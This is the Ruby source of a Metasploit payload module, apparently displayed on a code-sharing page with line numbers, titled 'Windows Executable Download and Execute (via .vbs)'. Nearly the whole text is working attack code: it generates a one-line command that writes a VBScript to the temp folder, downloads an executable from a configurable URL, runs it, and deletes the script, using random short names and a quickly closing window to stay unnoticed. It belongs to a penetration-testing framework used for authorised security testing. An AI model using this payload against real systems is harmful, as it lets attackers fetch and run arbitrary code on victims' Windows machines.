Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = :dynamic
10

11
  include Msf::Payload::Single
12
  include Msf::Sessions::CommandShellOptions
13

14
  def initialize(info = {})
15
    super(merge_info(info,
16
      'Name'        => 'Windows Executable Download and Execute (via .vbs)',
17
      'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
18
      'Author'      => 'scriptjunkie',
19
      'License'     => BSD_LICENSE,
20
      'Platform'    => 'win',
21
      'Arch'        => ARCH_CMD,
22
      'Handler'     => Msf::Handler::None,
23
      'Session'     => Msf::Sessions::CommandShell,
24
      'PayloadType' => 'cmd',
25
      'RequiredCmd' => 'wscript',
26
      'Payload'     =>
27
        {
28
          'Offsets' => { },
29
          'Payload' => ''
30
        }
31
      ))
32

33
    register_options(
34
      [
35
        OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]),
36
        OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]),
37
        OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
38
        OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ])
39
      ])
40
  end
41

42
  def generate(_opts = {})
43
    return super + command_string
44
  end
45

46
  def command_string
47
    # It's already long. Keep variable names short.
48
    vbsname = Rex::Text.rand_text_alpha(1+rand(2))
49
    exename = Rex::Text.rand_text_alpha(1+rand(2))
50
    xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
51
    streamvar = Rex::Text.rand_text_alpha(1+rand(2))
52

53
    command = ''
54
    command << "cmd.exe /q /c " if datastore['INCLUDECMD']
55
    # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
56
    # disappears quickly before the wscript libraries load and the file downloads
57
    command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
58
      "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
59
      "#{xmlhttpvar}.Send:"+
60
      "Set #{streamvar}=CreateObject(\"ADODB.Stream\"):"+
61
      "#{streamvar}.Type=1:"+
62
      "#{streamvar}.Open:"+
63
      "#{streamvar}.Write #{xmlhttpvar}.responseBody:"+
64
      "#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:"+
65
      "CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":"
66
    command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
67
    command << " >#{vbsname}.vbs"+
68
      "&start wscript #{vbsname}.vbs"
69
  end
70
end
71

72